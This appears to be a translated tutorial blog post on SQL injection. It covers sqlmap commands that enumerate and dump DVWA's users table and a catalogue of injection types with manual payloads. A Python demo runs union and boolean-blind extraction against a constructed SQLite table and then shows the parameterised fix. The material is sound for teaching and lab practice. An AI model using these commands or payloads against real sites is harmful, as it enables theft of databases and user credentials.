[面包]MrTwoC
SQLmap and SQL injection demo

SQLmap

Environment: DVWA

On DVWA's SQL Injection page, enter any number in the User ID field and submit.
Intercept the request with Burp Suite to obtain the raw HTTP request:
Select all, copy the raw request into a new .txt file (sql.txt, the name used below) in the sqlmap root directory:
Then run sqlmap in CMD:
py .\sqlmap.py -r .\sql.txt
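As an added example (not from the original post), this is what the saved request file looks like for DVWA's SQL Injection page when DVWA is served from a local host under /dvwa/; the host and the session id are placeholders to replace with what Burp captured. The security=low and PHPSESSID cookies must be in the file: without a valid session DVWA redirects to its login page, and sqlmap would test the login form instead of the id parameter.

```http
GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0
Cookie: PHPSESSID=<session id from Burp>; security=low
Connection: close
```

With -r sqlmap tests every parameter it finds in the request (id and Submit); adding -p id restricts it to the id parameter, and --batch accepts the default answer to each prompt so the run does not stop to ask questions.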
From this first run sqlmap fingerprints the web server (Nginx) and PHP version, and the back-end DBMS and its version.
Then use
py .\sqlmap.py -r .\sql.txt --dbs
to enumerate the databases. In the same run sqlmap reports which injection techniques it confirmed on the id parameter; here four of them work
(boolean-based blind, error-based, time-based blind, and UNION query-based).

Enter
py .\sqlmap.py -r .\sql.txt -D dvwa --tables
to list the tables in the dvwa database.

py .\sqlmap.py -r .\sql.txt -D dvwa -T users --columns
to list the columns of the users table; the ones of interest are user and password.
py .\sqlmap.py -r .\sql.txt -D dvwa -T users -C user,password --dump
to dump the user and password columns. DVWA stores passwords as MD5 hashes, and when sqlmap recognises the hash format it offers to crack the dumped values with its built-in dictionary attack.

SQL Injection

The core of SQL injection
User-supplied data is concatenated into the query text and the result is executed by the database as one SQL statement, so the input can change the statement's meaning.
Types of SQL injection:
Union-based injection: append union select to the original query so attacker-chosen rows are returned alongside, or instead of, the real result
Boolean-based blind injection: inject a true/false condition and infer data from whether the page renders normally
Time-based blind injection: wrap the condition in sleep() and infer data from whether the response is delayed
Error-based injection: provoke a database error whose message leaks the queried data
Wide-byte injection: in a multi-byte charset such as GBK, a byte like %df placed before the escaping backslash (%5c) is consumed as the first byte of one two-byte character, so the quote that follows is no longer escaped
Stacked injection: use a semicolon to terminate the statement and append further statements (only works where the driver allows multiple statements per call)

Basic steps:
Identify the injection point: send a true and a false condition; if the page differs between them, the parameter is part of the query
id=1 and 1=1
id=1 and 1=2
Determine the number of columns: raise n until the database errors; the last n that works is the column count
id=1 order by 1
Identify the echo point: make the original condition false so only the UNION row is displayed, and note which numbers appear on the page
id=1 and 1=2 union select 1,2,3
Query the wanted content through the echoed column
id=1 and 1=2 union select 1,database(),3
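As an added worked example (not DVWA's code and not from the original post), the script below reproduces the four steps above and the boolean-based blind technique from the type list against an in-memory SQLite table that stands in for DVWA's users table; the rows and passwords are constructed. Because DVWA's low-security page wraps the id in single quotes, each payload starts with `1'` to close the quote and ends with `-- ` to comment out the trailing quote, the string-context form of the numeric payloads listed above. SQLite has no sleep() or database(), so time-based injection is not shown, and its unicode()/substr() stand in for MySQL's ascii()/substring(). The parameterised lookup at the end is the fix.

```python
import sqlite3

# Constructed stand-in for DVWA's users table; rows are made up for this example.
SETUP_SQL = """
CREATE TABLE users (
    user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT
);
INSERT INTO users VALUES (1, 'Alice', 'Smith', 'alice', 'S3cret!');
INSERT INTO users VALUES (2, 'Bob',   'Jones', 'bob',   'hunter2');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SETUP_SQL)
    return db


def vulnerable_lookup(db, user_id):
    """The injection core: user input concatenated into the statement text.
    Shape follows DVWA's low-security sqli page, which quotes the id."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(query).fetchall()


def safe_lookup(db, user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


# Step 1: identify the injection point. A true condition keeps the row,
# a false one removes it; the payload closes the quote and comments out the rest.
def is_injectable(db):
    true_case = vulnerable_lookup(db, "1' and '1'='1")
    false_case = vulnerable_lookup(db, "1' and '1'='2")
    return bool(true_case) and not false_case


# Step 2: determine the number of columns with ORDER BY n until the DB errors.
def count_columns(db, max_cols=16):
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(db, f"1' order by {n}-- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


# Step 3: find the echo point. The false condition empties the first SELECT,
# so whatever the UNION supplies is what the page displays.
def find_echo(db):
    return vulnerable_lookup(db, "1' and '1'='2' union select 1,2-- ")


# Step 4: pull the wanted content through the echoed columns.
def dump_users(db):
    rows = vulnerable_lookup(db, "1' and '1'='2' union select user, password from users-- ")
    return sorted(rows)


# Boolean-based blind: nothing is echoed, only "row shown / row not shown".
# Each character is recovered by binary search over its code point, which is
# also how sqlmap's boolean-based technique works.
def blind_extract_password(db, username, max_len=64):
    def oracle(condition):
        return bool(vulnerable_lookup(db, f"1' and ({condition})-- "))

    secret = f"(select password from users where user='{username}')"
    length = next(n for n in range(1, max_len + 1)
                  if oracle(f"length({secret})={n}"))
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126            # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite unicode()/substr(); MySQL equivalents are ascii()/substring()
            if oracle(f"unicode(substr({secret},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = connect()
    print("injectable:", is_injectable(db))
    print("columns:", count_columns(db))
    print("echo row:", find_echo(db))
    print("dump:", dump_users(db))
    print("blind:", blind_extract_password(db, "alice"))
    print("parameterised with payload:", safe_lookup(db, "1' and '1'='2"))
```

The same payload that dumps every password through vulnerable_lookup returns nothing from safe_lookup, because the driver sends it as a value compared against user_id rather than as SQL, which is the whole defence: never build the statement text from input.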
